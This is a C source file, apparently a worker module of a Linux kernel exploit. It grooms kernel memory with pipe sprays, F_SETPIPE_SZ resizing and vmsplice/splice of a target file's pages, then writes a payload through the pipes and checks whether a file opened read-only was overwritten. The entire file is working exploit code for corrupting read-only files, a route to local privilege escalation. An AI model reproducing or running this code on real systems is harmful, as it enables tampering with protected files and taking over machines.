#include "common.h"
#include "kernelsnitch/utils.h"

#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/uio.h>
#include <unistd.h>

enum {
	PIPE_SLOTS = 32,
	PIPE_OBJS_PER_SLAB = 16,
	PIPE_DRAIN_SLABS = 15,
	PIPE_RECLAIM_SLABS = 15,
};

static int (*drain_pipes)[2];
static int (*reclaim_pipes)[2];
static size_t drain_count;
static size_t reclaim_count;

static void prepare_pipe_arrays(void)
{
	drain_count = PIPE_OBJS_PER_SLAB * PIPE_DRAIN_SLABS;
	reclaim_count = PIPE_OBJS_PER_SLAB * PIPE_RECLAIM_SLABS;
	drain_pipes = malloc(drain_count * sizeof(*drain_pipes));
	reclaim_pipes = malloc(reclaim_count * sizeof(*reclaim_pipes));
	if (!drain_pipes || !reclaim_pipes)
		pr_error("allocate pipe arrays\n");
	for (size_t i = 0; i < drain_count; i++)
		drain_pipes[i][0] = drain_pipes[i][1] = -1;
	for (size_t i = 0; i < reclaim_count; i++)
		reclaim_pipes[i][0] = reclaim_pipes[i][1] = -1;
}

static void alloc_pipe(int pipefd[2])
{
	if (pipe(pipefd) != 0)
		pr_error("pipe: %m\n");
}

static void resize_pipe(int pipefd[2], size_t slots)
{
	if (fcntl(pipefd[0], F_SETPIPE_SZ, slots << 12) < 0)
		pr_error("F_SETPIPE_SZ slots=%zu: %m\n", slots);
}

static ssize_t vmsplice_call(int fd, const struct iovec *iov)
{
	return syscall(SYS_vmsplice, fd, iov, 1, 0);
}

static ssize_t splice_call(int input, int output)
{
	return syscall(SYS_splice, input, NULL, output, NULL, 1, 0);
}

static void prepare_file_slot(int pipefd[2], int target_fd, off_t offset,
			      void *advance, size_t advance_size)
{
	struct iovec iov = {.iov_base = advance, .iov_len = advance_size};
	size_t drained = 0;
	ssize_t count;

	count = vmsplice_call(pipefd[1], &iov);
	if (count != (ssize_t)advance_size)
		pr_error("vmsplice advance=%zd expected=%zu errno=%d\n",
			 count, advance_size, errno);
	if (lseek(target_fd, offset - 1, SEEK_SET) < 0 ||
	    splice_call(target_fd, pipefd[1]) != 1)
		pr_error("target splice: %m\n");
	while (drained < advance_size) {
		count = read(pipefd[0], (char *)advance + drained,
			     advance_size - drained);
		if (count <= 0)
			pr_error("drain advance=%zu count=%zd errno=%d\n",
				 drained, count, errno);
		drained += (size_t)count;
	}
}

int pipe_worker(const char *target, off_t offset,
		const unsigned char *payload, size_t payload_size,
		int command_fd)
{
	const size_t advance_size = PIPE_SLOT * EXPLOIT_PAGE_SIZE;
	unsigned char *observed;
	unsigned char *skb_data;
	void *advance;
	uint64_t page;
	char command = 0;
	int target_fd;
	bool hit;

	set_unbuffer();
	set_limit();
	pin_to_core(CORE);
	if (offset <= 0 ||
	    (offset & (EXPLOIT_PAGE_SIZE - 1)) + payload_size > EXPLOIT_PAGE_SIZE)
		pr_error("patch crosses page offset=%lld size=%zu\n",
			 (long long)offset, payload_size);

	skb_data = malloc(65536);
	if (!skb_data)
		pr_error("allocate skb data\n");
	memset(skb_data, 0x42, 65536);
	known_page_prepare(skb_data);
	prepare_pipe_arrays();
	for (size_t i = 0; i < reclaim_count; i++) {
		alloc_pipe(reclaim_pipes[i]);
		resize_pipe(reclaim_pipes[i], 2);
	}
	for (size_t i = 0; i < drain_count; i++) {
		alloc_pipe(drain_pipes[i]);
		resize_pipe(drain_pipes[i], 2);
	}

	pr_info("pipe worker pid=%d mm_size=1280 mm_order=3\n", getpid());
	page = known_page_acquire();
	advance = mmap(NULL, advance_size, PROT_READ | PROT_WRITE,
		       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (advance == MAP_FAILED)
		pr_error("advance mmap: %m\n");
	memset(advance, 'V', advance_size);
	for (size_t i = 0; i < drain_count; i++)
		resize_pipe(drain_pipes[i], PIPE_SLOTS);
	known_page_release();
	for (size_t i = 0; i < reclaim_count; i++)
		resize_pipe(reclaim_pipes[i], PIPE_SLOTS);

	target_fd = open(target, O_RDONLY | O_CLOEXEC);
	if (target_fd < 0)
		pr_error("open %s: %m\n", target);
	for (size_t i = 0; i < reclaim_count; i++)
		prepare_file_slot(reclaim_pipes[i], target_fd, offset,
				  advance, advance_size);
	munmap(advance, advance_size);
	pr_success("ROLE_READY role=B page=0x%016llx carrier=pipe rings=%zu slots=%d active_slot=%d backing=%s offset=%lld payload_len=%zu\n",
		   (unsigned long long)page, reclaim_count, PIPE_SLOTS,
		   PIPE_SLOT, target, (long long)offset, payload_size);

	for (;;) {
		ssize_t count = read(command_fd, &command, 1);

		if (count == 1)
			break;
		if (count < 0 && errno == EINTR)
			continue;
		return 2;
	}
	if (command != 'W')
		return 2;

	for (size_t i = 0; i < reclaim_count; i++) {
		if (write(reclaim_pipes[i][1], payload, payload_size) !=
		    (ssize_t)payload_size)
			pr_error("pipe payload index=%zu: %m\n", i);
	}
	observed = malloc(payload_size);
	if (!observed || pread(target_fd, observed, payload_size, offset) !=
	    (ssize_t)payload_size)
		pr_error("target pread: %m\n");
	hit = memcmp(observed, payload, payload_size) == 0;
	free(observed);
	printf("TWO_PAGE_READONLY_WRITE_%s page=0x%016llx target=%s offset=%lld len=%zu pipes=%zu\n",
	       hit ? "HIT" : "MISS", (unsigned long long)page, target,
	       (long long)offset, payload_size, reclaim_count);
	close(target_fd);
	return hit ? 0 : 1;
}
